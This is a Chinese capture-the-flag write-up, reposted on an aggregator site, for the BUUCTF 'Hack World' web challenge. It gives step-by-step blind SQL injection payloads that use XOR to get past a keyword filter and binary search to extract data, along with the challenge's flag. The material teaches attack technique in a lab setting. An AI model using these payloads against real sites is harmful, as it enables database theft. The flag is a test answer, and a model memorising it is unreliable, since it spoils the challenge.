buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

2024-04-23 08:00:07
开发
13

buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

1.根据提示，说明flag在表里
在这里插入图片描述

2.那就猜测存在sql注入，反手测试一波id=1'
在这里插入图片描述
3.尝试使用1'--+进行注释

4.直接丢进salmap里吧，不出意外多半是跑不出来

5.直接放入fuzz里进行测试

6.发现当我们使用异或时，出现了提示
Hello, glzjin wants a girlfriend.

7.那我们就按照这个思路进行注入
异或异或，相同为0，不同为1
在这里插入图片描述

8.判断数据库的长度

0^(length(database())>0)

在这里插入图片描述

0^(length(database())>16)

在这里插入图片描述
9.使用折半查找的方式进行测试

0^(length(database())>13)

在这里插入图片描述

0^(length(database())>10)

在这里插入图片描述

0^(length(database())>11)

在这里插入图片描述
10.说明数据库的长度为11

0^(length(database())=11)

在这里插入图片描述
12.判断数据库名

0^(ascii(substr(database(),1,1))>80)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>100)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>90)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>95)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>97)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>98)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>99)

在这里插入图片描述

id=0^(ascii(substr(database(),1,1))=99)

在这里插入图片描述

中间的折磨了好久想爆破数据库的表名，走啦好多的弯路，可以直接出来的

0^(ascii(substr((select(flag)from(flag)),{},1))>{})

在这里插入图片描述

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}

在这里插入图片描述

原文地址:https://blog.csdn.net/m_de_g/article/details/138067493 本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：https://www.suanlizi.com/kf/1782560040465600512.html 如若内容造成侵权/违法违规/事实不符，请联系《酸梨子》网邮箱：1419361763@qq.com进行投诉反馈，一经查实，立即删除！

阅读全部

相关推荐

[CISCN2019 华北赛区 Day2 Web1]Hack World 不会编程的崽

2024-04-23 08:00:07 17 阅读
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

2024-04-23 08:00:07 14 阅读
[CISCN2019 华东北赛区]Web2

2024-04-23 08:00:07 15 阅读
[CISCN2019 总决赛 Day2 Web1]Easyweb ----不会编程的崽

2024-04-23 08:00:07 16 阅读
BUUCTF-----[SWPU2019]Web1

2024-04-23 08:00:07 18 阅读
NOIP2018提高组day2 - T1：旅行

2024-04-23 08:00:07 33 阅读
精读《React Conf 2019 - Day1》

2024-04-23 08:00:07 16 阅读
[CISCN 2019华东南]Web11

2024-04-23 08:00:07 34 阅读
精读《React Conf 2019 - Day2》

2024-04-23 08:00:07 15 阅读
Web Day2

2024-04-23 08:00:07 33 阅读